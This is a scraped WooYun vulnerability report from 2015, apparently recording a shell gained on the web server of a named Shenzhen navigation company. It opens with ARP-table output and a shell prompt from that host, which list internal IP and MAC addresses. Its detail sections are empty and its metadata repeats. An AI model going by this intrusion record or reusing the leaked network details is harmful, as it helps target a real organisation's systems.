  192.110.10.218        c8-1f-66-f3-ee-e4     dynamic   
  192.110.10.219        c8-1f-66-f5-59-71     dynamic   
Interface: 91.0.0.174 --- 0x10004
  Internet Address      Physical Address      Type
  90.0.6.196            a4-1f-72-90-d8-31     dynamic   
  91.0.0.2              00-19-e0-ce-28-de     dynamic   
  91.0.0.13             00-1d-09-1a-f2-cb     dynamic   
  91.0.0.45             00-15-c5-ec-fe-7f     dynamic   
  91.0.0.68             a4-1f-72-91-f5-67     dynamic   
  91.0.0.73             00-13-72-52-84-13     dynamic   
  91.0.0.96             00-22-19-56-82-bf     dynamic   
  91.0.0.97             00-22-19-56-83-96     dynamic   
  91.0.0.180            a4-1f-72-90-d9-f7     dynamic   
  91.0.0.192            00-14-22-19-e7-b3     dynamic   
  91.0.7.163            ce-10-34-a8-97-66     dynamic   
系统找不到指定的路径。
E:\车圣宝典服务\bin\>
WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161781

漏洞标题：深圳市赛格导航科技股份有限公司官网服务器getshell

相关厂商：深圳市赛格导航科技股份有限公司

漏洞作者：朱元璋

提交时间：2015-12-16 13:58

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161781

漏洞标题：深圳市赛格导航科技股份有限公司官网服务器getshell

相关厂商：深圳市赛格导航科技股份有限公司

漏洞作者： 朱元璋

提交时间：2015-12-16 13:58

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0161781"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 朱元璋@乌云

漏洞回应

厂商回应：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：朱元璋

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源朱元璋@乌云
